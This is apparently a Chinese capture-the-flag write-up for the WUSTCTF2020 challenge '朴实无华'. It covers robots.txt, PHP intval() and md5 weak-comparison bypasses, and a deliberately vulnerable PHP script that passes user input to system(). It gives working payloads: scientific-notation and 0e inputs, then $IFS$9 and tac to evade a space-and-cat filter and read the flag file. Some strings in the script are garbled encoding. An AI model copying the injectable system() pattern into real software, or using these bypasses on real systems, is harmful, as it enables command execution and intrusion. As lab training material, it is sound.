[WUSTCTF2020]朴实无华

涉及知识点：

1.robots.txt

   robots.txt是一个协议,我们可以把它理解为一个网站的"管家",它会告诉搜索引擎哪些页面可以访问,哪些页面不能访问。也可以规定哪些搜索引擎可以访问我们的网站而哪些搜索引擎不能爬取我们网站的信息等等,是网站管理者指定的"君子协议"。

        当一个搜索机器人（有的叫搜索蜘蛛）访问一个站点时，它会首先检查该站点根目录下是否存在robots.txt，如果存在，搜索机器人就会按照该文件中的内容来确定访问的范围；如果该文件不存在，那么搜索机器人就沿着链接抓取。

        另外，robots.txt必须放置在一个站点的根目录下，而且文件名必须全部小写。
————————————————
版权声明：本文为CSDN博主「RexHarrr」的原创文章，遵循CC 4.0 BY-SA版权协议，转载请附上原文出处链接及本声明。
原文链接：https://blog.csdn.net/m0_51683653/article/details/127252676

如下的robots.txt中，User-agent表示允许访问的机器人，当出现User-agent：*时，表示允许任何搜索引擎或搜索机器人访问，Disallow和allow则是表示允许和禁止访问的页面地址

2.函数的绕过

intval()函数的绕过，常用于取整数部分，这题中涉及到对于科学计数法表示的数的输出；当输入为科学计数法时，输出计数法前的数字；当输入科学计数法和其他数字的组合时，输出科学计数法；

md5的弱比较，这个就两种方法，数组绕过和利用科学计数法绕过

str_replace(find,replace,string,count)

打开环境，看见一个bot，这里就涉及前面说的robots.txt协议了

访问robots看看，有一个网页，进去看看发现没有flag，抓个包看看有没有什么提示

果然是有提示，通过网络的响应头来查看文件备份

接着看看里面有没有提示，开始代码审计

<img src="/img.jpg">
<?php
header('Content-type:text/html;charset=utf-8');
error_reporting(0);
highlight_file(__file__);


//level 1
if (isset($_GET['num'])){
    $num = $_GET['num'];
    if(intval($num) < 2020 && intval($num + 1) > 2021){
        echo "鎴戜笉缁忔剰闂寸湅浜嗙湅鎴戠殑鍔冲姏澹�, 涓嶆槸鎯崇湅鏃堕棿, 鍙槸鎯充笉缁忔剰闂�, 璁╀綘鐭ラ亾鎴戣繃寰楁瘮浣犲ソ.</br>";
    }else{
        die("閲戦挶瑙ｅ喅涓嶄簡绌蜂汉鐨勬湰璐ㄩ棶棰�");
    }
}else{
    die("鍘婚潪娲插惂");
}
//level 2
if (isset($_GET['md5'])){
   $md5=$_GET['md5'];
   if ($md5==md5($md5))
       echo "鎯冲埌杩欎釜CTFer鎷垮埌flag鍚�, 鎰熸縺娑曢浂, 璺戝幓涓滄緶宀�, 鎵句竴瀹堕鍘�, 鎶婂帹甯堣桨鍑哄幓, 鑷繁鐐掍袱涓嬁鎵嬪皬鑿�, 鍊掍竴鏉暎瑁呯櫧閰�, 鑷村瘜鏈夐亾, 鍒灏忔毚.</br>";
   else
       die("鎴戣刀绱у枈鏉ユ垜鐨勯厭鑲夋湅鍙�, 浠栨墦浜嗕釜鐢佃瘽, 鎶婁粬涓€瀹跺畨鎺掑埌浜嗛潪娲�");
}else{
    die("鍘婚潪娲插惂");
}

//get flag
if (isset($_GET['get_flag'])){
    $get_flag = $_GET['get_flag'];
    if(!strstr($get_flag," ")){
        $get_flag = str_ireplace("cat", "wctf2020", $get_flag);
        echo "鎯冲埌杩欓噷, 鎴戝厖瀹炶€屾鎱�, 鏈夐挶浜虹殑蹇箰寰€寰€灏辨槸杩欎箞鐨勬湸瀹炴棤鍗�, 涓旀灟鐕�.</br>";
        system($get_flag);
    }else{
        die("蹇埌闈炴床浜�");
    }
}else{
    die("鍘婚潪娲插惂");
}
?>
鍘婚潪娲插惂

第一层的intval()函数，前面也叙述过绕过方法，需要用科学技术法进行绕过

num=2e10

第二层一个md5弱比较，这里用md5传参的值和经过md5编码后的值比较，只能用0e绕过了

md5=0e215962017

第三层是过滤了空格，并且如果有cat会被替代，空格用$IFS$9替代 cat用tac替代

先命令查看目录

get_flag=ls;
get_flag=tac$IFS$9fllllllllllllllllllllllllllllllllllllllllaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaag